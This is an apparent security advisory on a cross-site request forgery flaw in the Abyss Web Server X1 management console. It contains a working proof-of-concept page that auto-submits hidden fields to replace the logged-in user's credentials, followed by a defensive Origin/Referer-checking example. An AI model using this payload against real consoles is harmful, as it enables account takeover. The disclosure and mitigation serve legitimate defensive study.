http://osvdb.org/show/osvdb/64693
http://cross-site-scripting.blogspot.com/2010/05/abyss-web-server-x1-xsrf.html

Abyss Web Server X1 XSRF

A cross-site request forgery vulnerability in the Abyss Web Server X1 <http://www.aprelium.com/abyssws/download.php> management console can be exploited to change both the username and password of the logged-in user.

PoC:

    <html>
    <body onload="document.forms[0].submit()">
    <form method="post" action="http://localhost:9999/console/credentials">
    <input type="hidden" name="/console/credentials/login"
    value="new_username" />
    <input type="hidden" name="/console/credentials/password/$pass1"
    value="new_password" />
    <input type="hidden" name="/console/credentials/password/$pass2"
    value="new_password" />
    <input type="hidden" name="/console/credentials/bok"
    value="%C2%A0%C2%A0OK%C2%A0%C2%A0" />
    </form>
    </body>
    </html>
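The forged POST above succeeds because the console accepts a credentials change without checking where the request came from. One way to reject it, shown as an added example that is not part of the original advisory or Aprelium's code, is an Origin/Referer check on every state-changing request. The console origin is assumed from the PoC's form action, and the request shape, function names and `attacker.example` host are hypothetical.

```javascript
// Added example (not from the advisory): reject cross-origin state-changing
// requests to the management console by checking Origin, then Referer.
// Assumption: the console's own origin, taken from the PoC's form action.
const CONSOLE_ORIGINS = new Set(["http://localhost:9999"]);
const SAFE_METHODS = new Set(["GET", "HEAD", "OPTIONS"]);

// Normalise a header value to "scheme://host[:port]", or null if unusable.
function originOf(value) {
  if (typeof value !== "string" || value === "" || value === "null") return null;
  try {
    const origin = new URL(value).origin;
    return origin === "null" ? null : origin;
  } catch {
    return null; // malformed header
  }
}

// req is a hypothetical shape: { method, headers } with lower-cased header names.
function checkConsoleRequest(req) {
  const method = String(req.method || "").toUpperCase();
  if (SAFE_METHODS.has(method)) return { allow: true, reason: "safe method" };
  const headers = req.headers || {};
  // If Origin is present it is authoritative (including the opaque "null");
  // Referer is consulted only when the browser sent no Origin at all.
  const raw = headers.origin !== undefined ? headers.origin : headers.referer;
  const source = originOf(raw);
  if (source === null) return { allow: false, reason: "no usable Origin or Referer" };
  if (!CONSOLE_ORIGINS.has(source)) {
    return { allow: false, reason: "cross-origin request from " + source };
  }
  return { allow: true, reason: "same origin" };
}

// Constructed sample requests; attacker.example is a placeholder host.
const SAMPLES = {
  forged: { method: "POST", headers: { origin: "http://attacker.example" } },
  console: { method: "POST", headers: { origin: "http://localhost:9999" } },
  refererOnly: { method: "POST",
    headers: { referer: "http://localhost:9999/console/credentials" } },
  sandboxed: { method: "POST",
    headers: { origin: "null", referer: "http://localhost:9999/console/" } },
  bare: { method: "POST", headers: {} },
};

for (const [name, req] of Object.entries(SAMPLES)) {
  const verdict = checkConsoleRequest(req);
  console.log(name, verdict.allow ? "ALLOW" : "DENY", "-", verdict.reason);
}
```

Denying requests that carry neither header can also block non-browser clients, so this check is usually paired with a per-session anti-CSRF token embedded in the credentials form.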